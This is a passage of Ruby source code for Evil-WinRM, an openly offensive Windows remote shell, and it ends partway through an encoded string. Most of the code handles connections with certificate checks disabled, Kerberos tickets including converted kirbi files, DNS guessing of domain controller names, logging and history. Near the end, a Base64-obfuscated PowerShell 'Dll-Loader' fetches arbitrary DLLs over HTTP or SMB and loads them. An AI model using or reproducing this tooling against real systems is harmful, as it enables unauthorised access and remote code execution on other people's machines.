| $realm = options[:realm] 299 | $service = options[:service] 300 | $user_agent = options[:user_agent] 301 | $ccache_file = options[:ccache] 302 | unless $log.nil? 303 | 304 | FileUtils.mkdir_p $full_logging_path 305 | 306 | FileUtils.mkdir_p "#{$full_logging_path}/#{Time.now.strftime('%Y%d%m')}" 307 | 308 | FileUtils.mkdir_p "#{$full_logging_path}/#{Time.now.strftime('%Y%d%m')}/#{$host}" 309 | 310 | $filepath = "#{$full_logging_path}/#{Time.now.strftime('%Y%d%m')}/#{$host}/#{Time.now.strftime('%H%M%S')}" 311 | $logger = Logger.new($filepath) 312 | $logger.formatter = proc do |_severity, datetime, _progname, msg| 313 | "#{datetime}: #{msg}\n" 314 | end 315 | end 316 | return if $realm.nil? 317 | return unless $service.nil? 318 | 319 | $service = $default_service 320 | end 321 | 322 | # Print script header 323 | def print_header 324 | print_message("Evil-WinRM shell v#{VERSION}", TYPE_INFO, false) 325 | end 326 | 327 | # Generate connection object 328 | def connection_initialization 329 | # If using Kerberos and host is an IP, ask user if they want to resolve it to FQDN 330 | if (!$ccache_file.nil? || !$realm.nil?) && is_ip_address?($host) 331 | puts 332 | print_message("IP address detected (#{$host}). Kerberos requires FQDN. Do you want to attempt reverse DNS lookup?", TYPE_WARNING, true, $logger) 333 | print_message('Press "y" to attempt DNS resolution, press any other key to cancel', TYPE_WARNING, true, $logger) 334 | response = $stdin.getch.downcase 335 | puts 336 | 337 | if response == 'y' 338 | print_message("Attempting reverse DNS lookup to get FQDN for Kerberos...", TYPE_INFO, true, $logger) 339 | fqdn = resolve_ip_to_fqdn($host, $realm) 340 | if fqdn 341 | print_message("[+] Resolved IP #{$host} to FQDN: #{fqdn}", TYPE_SUCCESS, true, $logger) 342 | $host = fqdn 343 | else 344 | print_message("Could not resolve IP #{$host} to FQDN.", TYPE_ERROR, true, $logger) 345 | print_message("When using Kerberos tickets, you must provide an FQDN instead of an IP address.", TYPE_ERROR, true, $logger) 346 | custom_exit(1, false) 347 | end 348 | else 349 | print_message("DNS resolution cancelled by user.", TYPE_ERROR, true, $logger) 350 | print_message("When using Kerberos tickets, you must provide an FQDN instead of an IP address.", TYPE_ERROR, true, $logger) 351 | custom_exit(1, false) 352 | end 353 | end 354 | 355 | # Configure Kerberos ticket file if provided (supports both ccache and kirbi) 356 | if !$ccache_file.nil? 357 | expanded_path = File.expand_path($ccache_file) 358 | 359 | unless File.exist?(expanded_path) 360 | print_message("Kerberos ticket file not found: #{expanded_path}", TYPE_ERROR, true, $logger) 361 | custom_exit(1, false) 362 | end 363 | 364 | unless File.readable?(expanded_path) 365 | print_message("Kerberos ticket file is not readable: #{expanded_path}", TYPE_ERROR, true, $logger) 366 | custom_exit(1, false) 367 | end 368 | 369 | # Check if file is not empty 370 | if File.size(expanded_path) == 0 371 | print_message("Kerberos ticket file is empty: #{expanded_path}", TYPE_ERROR, true, $logger) 372 | custom_exit(1, false) 373 | end 374 | 375 | # Detect ticket type 376 | ticket_type = detect_ticket_type(expanded_path) 377 | 378 | # Convert kirbi to ccache if needed 379 | if ticket_type == :kirbi 380 | ccache_path = convert_kirbi_to_ccache(expanded_path) 381 | ticket_type_name = "kirbi" 382 | else 383 | # Already ccache format 384 | ccache_path = expanded_path 385 | ticket_type_name = "ccache" 386 | end 387 | 388 | # Only modify ENV if it's not already set to avoid memory issues 389 | # If user has already set KRB5CCNAME, we'll use that instead 390 | if ENV['KRB5CCNAME'].nil? || ENV['KRB5CCNAME'].empty? 391 | # Save original (nil) value 392 | $original_krb5ccname = ENV['KRB5CCNAME'] 393 | # Set KRB5CCNAME environment variable 394 | ENV['KRB5CCNAME'] = ccache_path 395 | print_message("Using #{ticket_type_name} Kerberos ticket file: #{expanded_path}", TYPE_INFO, true, $logger) 396 | else 397 | # User already has KRB5CCNAME set, save original and warn them 398 | $original_krb5ccname = ENV['KRB5CCNAME'] 399 | print_message("KRB5CCNAME is already set to: #{ENV['KRB5CCNAME']}. Using existing value instead of #{expanded_path}", TYPE_WARNING, true, $logger) 400 | end 401 | 402 | # Register at_exit handler to clean up KRB5CCNAME before any automatic cleanup 403 | # This prevents malloc errors when the process exits (especially when shell is idle) 404 | unless $kerberos_cleanup_registered 405 | at_exit do 406 | begin 407 | if defined?($original_krb5ccname) && !$original_krb5ccname.nil? 408 | ENV['KRB5CCNAME'] = $original_krb5ccname 409 | elsif defined?($original_krb5ccname) && $original_krb5ccname.nil? 410 | # Only delete if we set it (if original was nil) 411 | ENV.delete('KRB5CCNAME') if ENV.key?('KRB5CCNAME') 412 | end 413 | rescue => e 414 | # Ignore errors during cleanup 415 | end 416 | end 417 | $kerberos_cleanup_registered = true 418 | end 419 | end 420 | 421 | if $ssl 422 | $conn = if $pub_key && $priv_key 423 | WinRM::Connection.new( 424 | endpoint: "https://#{$host}:#{$port}/#{$url}", 425 | user: $user, 426 | password: $password, 427 | no_ssl_peer_verification: true, 428 | transport: :ssl, 429 | client_cert: $pub_key, 430 | client_key: $priv_key, 431 | user_agent: $user_agent 432 | ) 433 | elsif !$realm.nil? 434 | WinRM::Connection.new( 435 | endpoint: "https://#{$host}:#{$port}/#{$url}", 436 | user: '', 437 | password: '', 438 | transport: :kerberos, 439 | realm: $realm, 440 | no_ssl_peer_verification: true, 441 | user_agent: $user_agent 442 | ) 443 | else 444 | WinRM::Connection.new( 445 | endpoint: "https://#{$host}:#{$port}/#{$url}", 446 | user: $user, 447 | password: $password, 448 | no_ssl_peer_verification: true, 449 | transport: :ssl, 450 | user_agent: $user_agent 451 | ) 452 | end 453 | 454 | elsif !$realm.nil? 455 | $conn = WinRM::Connection.new( 456 | endpoint: "http://#{$host}:#{$port}/#{$url}", 457 | user: '', 458 | password: '', 459 | transport: :kerberos, 460 | realm: $realm, 461 | service: $service, 462 | user_agent: $user_agent 463 | ) 464 | else 465 | $conn = WinRM::Connection.new( 466 | endpoint: "http://#{$host}:#{$port}/#{$url}", 467 | user: $user, 468 | password: $password, 469 | no_ssl_peer_verification: true, 470 | user_agent: $user_agent 471 | ) 472 | end 473 | end 474 | 475 | # Detect if a docker environment 476 | def docker_detection 477 | return true if File.exist?('/.dockerenv') 478 | 479 | false 480 | end 481 | 482 | # Define colors 483 | def colorize(text, color = 'default') 484 | colors = { 'default' => '38', 'blue' => '34', 'red' => '31', 'yellow' => '1;33', 'magenta' => '35', 485 | 'green' => '1;32' } 486 | color_code = colors[color] 487 | "\001\033[0;#{color_code}m\002#{text}\001\033[0m\002" 488 | end 489 | 490 | # Messsage printing 491 | def print_message(msg, msg_type=TYPE_INFO, prefix_print=true, log=nil) 492 | if msg_type == TYPE_INFO then 493 | msg_prefix = "Info: " 494 | color = "blue" 495 | elsif msg_type == TYPE_WARNING then 496 | msg_prefix = "Warning: " 497 | color = "yellow" 498 | elsif msg_type == TYPE_ERROR then 499 | msg_prefix = "Error: " 500 | color = "red" 501 | elsif msg_type == TYPE_DATA then 502 | msg_prefix = "Data: " 503 | color = 'magenta' 504 | elsif msg_type == TYPE_SUCCESS then 505 | color = 'green' 506 | else 507 | msg_prefix = "" 508 | color = "default" 509 | end 510 | 511 | if !prefix_print then 512 | msg_prefix = "" 513 | end 514 | 515 | puts(' ') 516 | 517 | if $colors_enabled then 518 | puts(self.colorize("#{msg_prefix}#{msg}", color)) 519 | else 520 | puts("#{msg_prefix}#{msg}") 521 | end 522 | 523 | if !log.nil? 524 | log.info("#{msg_prefix}#{msg}") 525 | end 526 | end 527 | 528 | # SSL validation 529 | def check_ssl(pub_key, priv_key) 530 | pub_key = pub_key.to_s 531 | priv_key = priv_key.to_s 532 | if $ssl 533 | unless pub_key.empty? && priv_key.empty? then 534 | unless [pub_key, priv_key].all? {|f| File.exist?(f) } then 535 | print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(pub_key) 536 | 537 | print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(priv_key) 538 | 539 | custom_exit(1) 540 | end 541 | end 542 | print_message('SSL enabled', TYPE_WARNING) 543 | else 544 | print_message("Useless cert/s provided, SSL is not enabled", TYPE_WARNING, true, $logger) unless pub_key.empty? && priv_key.empty? 545 | end 546 | end 547 | 548 | # Directories validation 549 | def check_directories(path, purpose) 550 | if path == '' 551 | print_message("The directory used for #{purpose} can't be empty. Please set a path", TYPE_ERROR, true, $logger) 552 | custom_exit(1) 553 | end 554 | 555 | if !(/cygwin|mswin|mingw|bccwin|wince|emx/ =~ RUBY_PLATFORM).nil? 556 | # Windows 557 | path.concat('\\') if path[-1] != '\\' 558 | elsif path[-1] != '/' 559 | # Unix 560 | path.concat('/') 561 | end 562 | 563 | unless File.directory?(path) 564 | print_message("The directory \"#{path}\" used for #{purpose} was not found", TYPE_ERROR, true, $logger) 565 | custom_exit(1) 566 | end 567 | 568 | case purpose 569 | when 'scripts' 570 | $scripts_path = path 571 | when 'executables' 572 | $executables_path = path 573 | end 574 | end 575 | 576 | # Silent warnings 577 | def silent_warnings 578 | old_stderr = $stderr 579 | $stderr = StringIO.new 580 | yield 581 | ensure 582 | $stderr = old_stderr 583 | end 584 | 585 | # Read powershell script files 586 | def read_scripts(scripts) 587 | files = Dir.entries(scripts).select { |f| File.file? File.join(scripts, f) } || [] 588 | files.grep(/^*\.(ps1|psd1|psm1)$/) 589 | end 590 | 591 | # Read executable files 592 | def read_executables(executables) 593 | Dir.glob("#{executables}*.exe", File::FNM_DOTMATCH) 594 | end 595 | 596 | # Read local files and directories names 597 | def paths(a_path) 598 | parts = get_dir_parts(a_path) 599 | my_dir = parts[0] 600 | grep_for = parts[1] 601 | 602 | my_dir = File.expand_path(my_dir) 603 | my_dir += '/' unless my_dir[-1] == '/' 604 | 605 | files = Dir.glob("#{my_dir}*", File::FNM_DOTMATCH) 606 | directories = Dir.glob("#{my_dir}*").select { |f| File.directory? f } 607 | 608 | result = (files + directories) || [] 609 | 610 | result.grep(/^#{Regexp.escape(my_dir)}#{grep_for}/i).uniq 611 | end 612 | 613 | # Custom exit 614 | def custom_exit(exit_code = 0, message_print = true) 615 | if message_print 616 | case exit_code 617 | when 0 618 | print_message("Exiting with code #{exit_code}", TYPE_INFO, true, $logger) 619 | when 1 620 | print_message("Exiting with code #{exit_code}", TYPE_ERROR, true, $logger) 621 | when 130 622 | print_message('Exiting...', TYPE_INFO, true, $logger) 623 | else 624 | print_message("Exiting with code #{exit_code}", TYPE_ERROR, true, $logger) 625 | end 626 | end 627 | 628 | # Restore KRB5CCNAME environment variable before exiting to avoid memory issues 629 | begin 630 | if defined?($original_krb5ccname) && !$original_krb5ccname.nil? 631 | ENV['KRB5CCNAME'] = $original_krb5ccname 632 | elsif defined?($original_krb5ccname) && $original_krb5ccname.nil? 633 | # Only delete if we set it (if original was nil) 634 | ENV.delete('KRB5CCNAME') if ENV.key?('KRB5CCNAME') 635 | end 636 | rescue => e 637 | # Ignore errors during cleanup 638 | end 639 | 640 | # Close connection explicitly before exiting to avoid memory issues with Kerberos 641 | begin 642 | if defined?($conn) && !$conn.nil? 643 | # Try to close the connection gracefully 644 | $conn = nil 645 | end 646 | rescue => e 647 | # Ignore errors during cleanup 648 | end 649 | 650 | # Use exit! to bypass at_exit handlers that might cause memory issues 651 | # This prevents the malloc error when using Kerberos 652 | exit!(exit_code) 653 | end 654 | 655 | # Progress bar 656 | def progress_bar(bytes_done, total_bytes) 657 | progress = ((bytes_done.to_f / total_bytes) * 100).round 658 | progress_bar = (progress / 10).round 659 | progress_string = '▓' * (progress_bar - 1).clamp(0, 9) 660 | progress_string = "#{progress_string}▒#{'░' * (10 - progress_bar)}" 661 | message = "Progress: #{progress}% : |#{progress_string}| \r" 662 | $stdout.print message 663 | end 664 | 665 | # Get filesize 666 | def filesize(shell, path) 667 | shell.run("(get-item '#{path}').length").output.strip.to_i 668 | end 669 | 670 | # Clear screen 671 | def clear_screen 672 | system('clear') || system('cls') || puts("\033[2J\033[H") 673 | end 674 | 675 | # Get history file path based on host and user 676 | def get_history_file_path 677 | history_dir = File.join(Dir.home, '.evil-winrm', 'history') 678 | FileUtils.mkdir_p(history_dir) unless Dir.exist?(history_dir) 679 | 680 | # Create a safe filename from host and user 681 | safe_host = ($host || 'unknown').gsub(/[^a-zA-Z0-9._-]/, '_') 682 | safe_user = ($user || 'unknown').gsub(/[^a-zA-Z0-9._-]/, '_') 683 | history_filename = "#{safe_host}_#{safe_user}.hist" 684 | 685 | File.join(history_dir, history_filename) 686 | end 687 | 688 | # Load history from file 689 | def load_history 690 | history_file = get_history_file_path 691 | return unless File.exist?(history_file) 692 | 693 | begin 694 | File.readlines(history_file).each do |line| 695 | line = line.chomp 696 | Readline::HISTORY.push(line) unless line.empty? 697 | end 698 | rescue => e 699 | # Silently fail if history can't be loaded 700 | end 701 | end 702 | 703 | # Save command to history file 704 | def save_to_history(command) 705 | return if command.nil? || command.strip.empty? || command.strip == 'exit' 706 | 707 | history_file = get_history_file_path 708 | begin 709 | File.open(history_file, 'a') do |f| 710 | f.puts(command) 711 | end 712 | rescue => e 713 | # Silently fail if history can't be saved 714 | end 715 | end 716 | 717 | # Resolve IP address to FQDN using reverse DNS lookup 718 | # Returns the best FQDN when multiple PTR records exist (prioritizes server FQDN over domain name) 719 | # If only domain is found, attempts to construct and verify server FQDN using forward DNS 720 | # Also checks /etc/hosts for manual entries 721 | def resolve_ip_to_fqdn(ip_address, realm = nil) 722 | require 'socket' 723 | require 'resolv' 724 | begin 725 | resolver = Resolv::DNS.new 726 | hostnames = [] 727 | 728 | # Step 0: Check /etc/hosts for manual entries (highest priority) 729 | if File.exist?('/etc/hosts') && File.readable?('/etc/hosts') 730 | begin 731 | File.readlines('/etc/hosts').each do |line| 732 | # Skip comments and empty lines 733 | next if line.strip.empty? || line.strip.start_with?('#') 734 | 735 | # Parse line: IP hostname1 hostname2 ... 736 | parts = line.split 737 | next if parts.empty? 738 | 739 | # Check if first part matches our IP 740 | if parts[0] == ip_address 741 | # Add all hostnames from this line 742 | parts[1..-1].each do |hostname| 743 | # Only consider FQDNs (contain at least one dot) 744 | if hostname && hostname.include?('.') 745 | hostnames << hostname unless hostnames.include?(hostname) 746 | end 747 | end 748 | end 749 | end 750 | if !hostnames.empty? 751 | print_message("Found FQDN(s) in /etc/hosts: #{hostnames.join(', ')}", TYPE_INFO, true, $logger) 752 | end 753 | rescue => e 754 | # If we can't read /etc/hosts, continue with DNS lookup 755 | end 756 | end 757 | 758 | # Step 1: Get all PTR records (reverse DNS) 759 | begin 760 | ptr_name = Resolv::IPv4.create(ip_address).to_name 761 | ptr_records = resolver.getresources(ptr_name, Resolv::DNS::Resource::IN::PTR) 762 | 763 | ptr_records.each do |ptr| 764 | hostname = ptr.name.to_s 765 | if hostname && hostname.include?('.') 766 | hostnames << hostname unless hostnames.include?(hostname) 767 | end 768 | end 769 | rescue Resolv::ResolvError, Resolv::ResolvTimeout 770 | # If Resolv::DNS fails, try Resolv.getname as fallback 771 | begin 772 | hostname = Resolv.getname(ip_address) 773 | if hostname && hostname.include?('.') 774 | hostnames << hostname unless hostnames.include?(hostname) 775 | end 776 | rescue Resolv::ResolvError 777 | # Continue to Socket fallback 778 | end 779 | end 780 | 781 | # If no results from Resolv, try Socket.getnameinfo 782 | if hostnames.empty? 783 | begin 784 | hostname = Socket.getnameinfo([Socket::AF_INET, nil, ip_address], Socket::NI_NAMEREQD)[0] 785 | if hostname && hostname.include?('.') 786 | hostnames << hostname unless hostnames.include?(hostname) 787 | end 788 | rescue SocketError 789 | # All methods failed 790 | end 791 | end 792 | 793 | # Step 2: If we only got the domain name, try to find the server FQDN 794 | # Remove duplicates before checking 795 | hostnames.uniq! 796 | 797 | # Only do this if we don't already have a server FQDN (3+ parts) from /etc/hosts or DNS 798 | has_server_fqdn = hostnames.any? { |h| h.split('.').length >= 3 } 799 | domain_only = hostnames.find { |h| h.split('.').length == 2 } 800 | 801 | # Only attempt forward DNS lookup if: 802 | # 1. We don't already have a server FQDN 803 | # 2. We have a domain-only result 804 | # 3. We have a realm to work with 805 | if !has_server_fqdn && domain_only && realm 806 | # Try common DC hostname patterns 807 | domain = domain_only.downcase 808 | realm_domain = realm.downcase 809 | 810 | # Common DC naming patterns 811 | candidates = [ 812 | "dc01.#{domain}", 813 | "dc1.#{domain}", 814 | "dc.#{domain}", 815 | "dc01.#{realm_domain}", 816 | "dc1.#{realm_domain}", 817 | "dc.#{realm_domain}", 818 | "ad.#{domain}", 819 | "ad.#{realm_domain}", 820 | "ad01.#{domain}", 821 | "ad01.#{realm_domain}" 822 | ] 823 | 824 | # Remove duplicates from candidates (in case we already have it) 825 | candidates.reject! { |c| hostnames.include?(c) } 826 | 827 | # Verify each candidate with forward DNS lookup 828 | candidates.each do |candidate| 829 | begin 830 | addresses = resolver.getaddresses(candidate) 831 | # Check if any of the resolved addresses match our IP 832 | if addresses.any? { |addr| addr.to_s == ip_address } 833 | hostnames << candidate unless hostnames.include?(candidate) 834 | print_message("Found server FQDN via forward DNS lookup: #{candidate}", TYPE_INFO, true, $logger) 835 | # Stop after finding first valid server FQDN 836 | break 837 | end 838 | rescue Resolv::ResolvError 839 | # This candidate doesn't resolve, skip it 840 | end 841 | end 842 | end 843 | 844 | return nil if hostnames.empty? 845 | 846 | # Step 3: Select the best FQDN 847 | # If we have multiple results, prioritize the server FQDN over domain name 848 | if hostnames.length > 1 849 | # Sort by: more dots first, then by length (longer = more specific) 850 | sorted = hostnames.sort_by { |h| [-h.count('.'), -h.length] } 851 | 852 | # Prefer hostnames that look like server names (have a hostname prefix before the domain) 853 | # e.g., "dc01.futuristic.tech" over "futuristic.tech" 854 | best = sorted.find { |h| h.split('.').length >= 3 } || sorted.first 855 | 856 | print_message("Multiple DNS names found: #{hostnames.join(', ')}. Selected: #{best}", TYPE_INFO, true, $logger) 857 | return best 858 | else 859 | result = hostnames.first 860 | # If we only have domain, warn the user 861 | if result.split('.').length == 2 862 | print_message("Only domain name found (#{result}). Server FQDN not detected. Kerberos may still work.", TYPE_WARNING, true, $logger) 863 | end 864 | return result 865 | end 866 | rescue => e 867 | # Any other error 868 | return nil 869 | end 870 | end 871 | 872 | # Check if a string is an IP address 873 | def is_ip_address?(str) 874 | # Match IPv4 address pattern 875 | ipv4_pattern = /^(\d{1,3}\.){3}\d{1,3}$/ 876 | return true if str.match?(ipv4_pattern) 877 | 878 | # Match IPv6 address pattern (simplified) 879 | ipv6_pattern = /^([0-9a-fA-F]{0,4}:){2,7}[0-9a-fA-F]{0,4}$/ 880 | return true if str.match?(ipv6_pattern) 881 | 882 | false 883 | end 884 | 885 | # Detect ticket file type (kirbi or ccache) 886 | def detect_ticket_type(file_path) 887 | # Check by extension first 888 | ext = File.extname(file_path).downcase 889 | return :kirbi if ext == '.kirbi' 890 | return :ccache if ext == '.ccache' 891 | 892 | # If no extension or unknown, try to detect by file content 893 | # Kirbi files typically start with specific ASN.1 structures 894 | # CCache files have a different structure 895 | begin 896 | first_bytes = File.binread(file_path, 4) 897 | # Kirbi files often start with specific ASN.1 tags 898 | # This is a heuristic - not 100% reliable but works for most cases 899 | if first_bytes[0] == 0x76 || first_bytes[0] == 0x6a || first_bytes[0] == 0x61 900 | return :kirbi 901 | end 902 | # CCache files have a different structure 903 | return :ccache 904 | rescue => e 905 | # If we can't read, default to ccache 906 | return :ccache 907 | end 908 | end 909 | 910 | # Convert kirbi ticket to ccache format 911 | def convert_kirbi_to_ccache(kirbi_path) 912 | # Validate input file first 913 | expanded_kirbi = File.expand_path(kirbi_path) 914 | 915 | unless File.exist?(expanded_kirbi) 916 | print_message("Kirbi ticket file not found: #{expanded_kirbi}", TYPE_ERROR, true, $logger) 917 | custom_exit(1, false) 918 | end 919 | 920 | unless File.readable?(expanded_kirbi) 921 | print_message("Kirbi ticket file is not readable: #{expanded_kirbi}", TYPE_ERROR, true, $logger) 922 | custom_exit(1, false) 923 | end 924 | 925 | # Check if file is not empty 926 | if File.size(expanded_kirbi) == 0 927 | print_message("Kirbi ticket file is empty: #{expanded_kirbi}", TYPE_ERROR, true, $logger) 928 | custom_exit(1, false) 929 | end 930 | 931 | # Generate output path (same directory, change extension) 932 | output_dir = File.dirname(expanded_kirbi) 933 | output_name = File.basename(expanded_kirbi, '.kirbi') + '.ccache' 934 | ccache_path = File.join(output_dir, output_name) 935 | 936 | # Try to find ticket converter (multiple possible names) 937 | converter_names = [ 938 | 'ticket_converter.py', 939 | 'impacket-ticketConverter', 940 | 'impacket-ticketConverter.py', 941 | 'ticketConverter.py', 942 | 'ticketConverter' 943 | ] 944 | 945 | converter_paths = [] 946 | 947 | # Check in PATH for each name 948 | converter_names.each do |name| 949 | cmd = `which #{name} 2>/dev/null`.strip 950 | converter_paths << cmd unless cmd.empty? 951 | end 952 | 953 | # Also check common installation paths 954 | converter_names.each do |name| 955 | converter_paths << name # Current directory 956 | converter_paths << "/usr/local/bin/#{name}" 957 | converter_paths << "/usr/bin/#{name}" 958 | converter_paths << File.join(Dir.home, '.local', 'bin', name) 959 | converter_paths << File.join(Dir.home, name) 960 | end 961 | 962 | # Remove duplicates and empty strings 963 | converter_paths.uniq! 964 | converter_paths.reject!(&:empty?) 965 | 966 | converter_found = nil 967 | converter_paths.each do |path| 968 | if File.exist?(path) && File.executable?(path) 969 | converter_found = path 970 | break 971 | end 972 | end 973 | 974 | unless converter_found 975 | print_message("Ticket converter not found. Please install one of: ticket_converter.py, impacket-ticketConverter, or impacket-ticketConverter.py.", TYPE_ERROR, true, $logger) 976 | print_message("Sources: https://github.com/Zer1t0/ticket_converter or https://github.com/SecureAuthCorp/impacket", TYPE_INFO, true, $logger) 977 | custom_exit(1, false) 978 | end 979 | 980 | # Check if it's a Python script or shell script 981 | is_python = false 982 | begin 983 | first_line = File.readlines(converter_found).first 984 | if first_line 985 | # Check for Python shebang 986 | if first_line.match?(/^#!.*python/) 987 | is_python = true 988 | # Check for shell shebang (bash, sh, etc.) - if it's shell, it's not Python 989 | elsif first_line.match?(/^#!.*\/(bin\/)?(bash|sh|zsh)/) 990 | is_python = false 991 | # Check extension 992 | elsif File.extname(converter_found) == '.py' 993 | is_python = true 994 | end 995 | elsif File.extname(converter_found) == '.py' 996 | is_python = true 997 | end 998 | rescue => e 999 | # If we can't read, check extension or assume it's executable and try directly 1000 | is_python = (File.extname(converter_found) == '.py') 1001 | end 1002 | 1003 | if is_python 1004 | # It's a Python script, need to run with python/python3 1005 | python_cmd = nil 1006 | ['python3', 'python'].each do |py| 1007 | if system("which #{py} > /dev/null 2>&1") 1008 | python_cmd = py 1009 | break 1010 | end 1011 | end 1012 | 1013 | unless python_cmd 1014 | print_message("Python not found. Please install Python 3 to convert kirbi tickets.", TYPE_ERROR, true, $logger) 1015 | custom_exit(1, false) 1016 | end 1017 | 1018 | cmd = "#{python_cmd} #{converter_found} #{expanded_kirbi} #{ccache_path} 2>&1" 1019 | else 1020 | # It's a shell script or executable, run it directly 1021 | cmd = "#{converter_found} #{expanded_kirbi} #{ccache_path} 2>&1" 1022 | end 1023 | 1024 | # Run conversion 1025 | print_message("Converting kirbi ticket to ccache format...", TYPE_INFO, true, $logger) 1026 | result = `#{cmd}` 1027 | 1028 | unless $?.success? 1029 | # Parse error output to provide a clearer message 1030 | error_lines = result.split("\n") 1031 | 1032 | # Check for common Python errors 1033 | if result.include?('ModuleNotFoundError') || result.include?('No module named') 1034 | module_match = result.match(/No module named ['"]([^'"]+)['"]/) 1035 | module_name = module_match ? module_match[1] : 'unknown' 1036 | if module_name == 'impacket' 1037 | print_message("The ticket converter requires impacket module which is not installed.", TYPE_ERROR, true, $logger) 1038 | print_message("Please install it with: pip3 install impacket", TYPE_INFO, true, $logger) 1039 | custom_exit(1, false) 1040 | else 1041 | print_message("The ticket converter requires Python module '#{module_name}' which is not installed.", TYPE_ERROR, true, $logger) 1042 | print_message("Please install required dependencies.", TYPE_INFO, true, $logger) 1043 | custom_exit(1, false) 1044 | end 1045 | elsif result.include?('ImportError') 1046 | print_message("The ticket converter has import errors. Please ensure all required Python dependencies are installed.", TYPE_ERROR, true, $logger) 1047 | print_message("For impacket scripts, run: pip3 install impacket", TYPE_INFO, true, $logger) 1048 | custom_exit(1, false) 1049 | elsif result.include?('Permission denied') || result.match?(/permission denied/i) 1050 | print_message("Permission denied when executing ticket converter. Please check file permissions: #{converter_found}", TYPE_ERROR, true, $logger) 1051 | custom_exit(1, false) 1052 | else 1053 | # Extract the most relevant error message (usually the last non-empty line) 1054 | error_msg = error_lines.reverse.find { |line| !line.strip.empty? && !line.strip.match?(/^Traceback|File "/) } 1055 | error_msg ||= error_lines.last || result.strip 1056 | error_msg = error_msg.strip 1057 | 1058 | # Limit error message length 1059 | error_msg = error_msg[0..200] + '...' if error_msg.length > 200 1060 | 1061 | print_message("Failed to convert kirbi to ccache using #{File.basename(converter_found)}.", TYPE_ERROR, true, $logger) 1062 | print_message("Error: #{error_msg}", TYPE_ERROR, true, $logger) 1063 | custom_exit(1, false) 1064 | end 1065 | end 1066 | 1067 | unless File.exist?(ccache_path) 1068 | print_message("Conversion completed but output file not found: #{ccache_path}", TYPE_ERROR, true, $logger) 1069 | custom_exit(1, false) 1070 | end 1071 | 1072 | print_message("[+] Successfully converted to: #{ccache_path}", TYPE_SUCCESS, true, $logger) 1073 | ccache_path 1074 | end 1075 | 1076 | # Main function 1077 | def main 1078 | arguments 1079 | print_header 1080 | connection_initialization 1081 | file_manager = WinRM::FS::FileManager.new($conn) 1082 | completion_check 1083 | 1084 | # Log check 1085 | print_message("Logging Enabled. Log file: #{$filepath}", TYPE_WARNING, true) unless $log.nil? 1086 | 1087 | # SSL checks 1088 | check_ssl($pub_key, $priv_key) 1089 | 1090 | # Kerberos checks 1091 | if !$user.nil? && !$realm.nil? 1092 | print_message('User is not needed for Kerberos auth. Ticket will be used', TYPE_WARNING, true, $logger) 1093 | end 1094 | 1095 | if !$password.nil? && !$realm.nil? 1096 | print_message('Password is not needed for Kerberos auth. Ticket will be used', TYPE_WARNING, true, $logger) 1097 | end 1098 | 1099 | if $realm.nil? && !$service.nil? 1100 | print_message('Useless spn provided, only used for Kerberos auth', TYPE_WARNING, true, $logger) 1101 | end 1102 | 1103 | # Kerberos checks 1104 | if !$ccache_file.nil? && $realm.nil? 1105 | print_message("Realm (-r) is required when using ccache file (-K)", TYPE_ERROR, true, $logger) 1106 | custom_exit(1, false) 1107 | end 1108 | 1109 | unless $scripts_path.nil? 1110 | check_directories($scripts_path, 'scripts') 1111 | @functions = read_scripts($scripts_path) 1112 | silent_warnings do 1113 | $LIST = $LIST + @functions 1114 | end 1115 | end 1116 | 1117 | unless $executables_path.nil? 1118 | check_directories($executables_path, 'executables') 1119 | @executables = read_executables($executables_path) 1120 | end 1121 | dllloader = Base64.decode64('ZnVuY3Rpb24gRGxsLUxvYWRlciB7CiAgICBwYXJhbShbc3dpdGNoXSRzbWIsIFtzd2l0Y2hdJGxvY2FsLCBbc3dpdGNoXSRodHRwLCBbc3RyaW5nXSRwYXRoKQoKICAgICRoZWxwPUAiCi5TWU5PUFNJUwogICAgZGxsIGxvYWRlci4KICAgIFBvd2VyU2hlbGwgRnVuY3Rpb246IERsbC1Mb2FkZXIKICAgIEF1dGhvcjogSGVjdG9yIGRlIEFybWFzICgzdjRTaTBOKQoKICAgIFJlcXVpcmVkIGRlcGVuZGVuY2llczogTm9uZQogICAgT3B0aW9uYWwgZGVwZW5kZW5jaWVzOiBOb25lCi5ERVNDUklQVElPTgogICAgLgouRVhBTVBMRQogICAgRGxsLUxvYWRlciAtc21iIC1wYXRoIFxcMTkyLjE2OC4xMzkuMTMyXFxzaGFyZVxcbXlEbGwuZGxsCiAgICBEbGwtTG9hZGVyIC1sb2NhbCAtcGF0aCBDOlxVc2Vyc1xQZXBpdG9cRGVza3RvcFxteURsbC5kbGwKICAgIERsbC1Mb2FkZXIgLWh0dHAgLXBhdGggaHR0cDovL2V4YW1wbGUuY29tL215RGxsLmRsbAoKICAgIERlc2NyaXB0aW9uCiAgICAtLS0tLS0tLS0tLQogICAgRnVuY3Rpb24gdGhhdCBsb2FkcyBhbiBhcmJpdHJhcnkgZGxsCiJACgogICAgaWYgKCgkc21iIC1lcSAkZmFsc2UgLWFuZCAkbG9jYWwgLWVxICRmYWxzZSAtYW5kICRodHRwIC1lcSAkZmFsc2UpIC1vciAoJHBhdGggLWVxICIiIC1vciAkcGF0aCAtZXEgJG51bGwpKQogICAgewogICAgICAgIHdyaXRlLWhvc3QgIiRoZWxwYG4iCiAgICB9CiAgICBlbHNlCiAgICB7CgogICAgICAgIGlmICgkaHR0cCkKICAgICAgICB7CiAgICAgICAgICAgIFdyaXRlLUhvc3QgIlsrXSBSZWFkaW5nIGRsbCBieSBIVFRQIgogICAgICAgICAgICAkd2ViY2xpZW50ID0gW05ldC5XZWJDbGllbnRdOjpuZXcoKQogICAgICAgICAgICAkZGxsID0gJHdlYmNsaWVudC5Eb3dubG9hZERhdGEoJHBhdGgpCiAgICAgICAgfQogICAgICAgIGVsc2UKICAgICAgICB7CiAgICAgICAgICAgIGlmKCRzbWIpeyBXcml0ZS1Ib3N0ICJbK10gUmVhZGluZyBkbGwgYnkgU01CIiB9CiAgICAgICAgICAgIGVsc2UgeyBXcml0ZS1Ib3N0ICJbK10gUmVhZGluZyBkbGwgbG9jYWxseSIgfQoKICAgICAgICAgICAgJGRsbCA9IFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRBbGxCeXRlcygkcGF0aCkKICAgICAgICB9CiAgICAgICAgCgogICAgICAgIGlmICgkZGxsIC1uZSAkbnVsbCkKICAgICAgICB7CiAgICAgICAgICAgIFdyaXRlLUhvc3QgIlsrXSBMb2FkaW5nI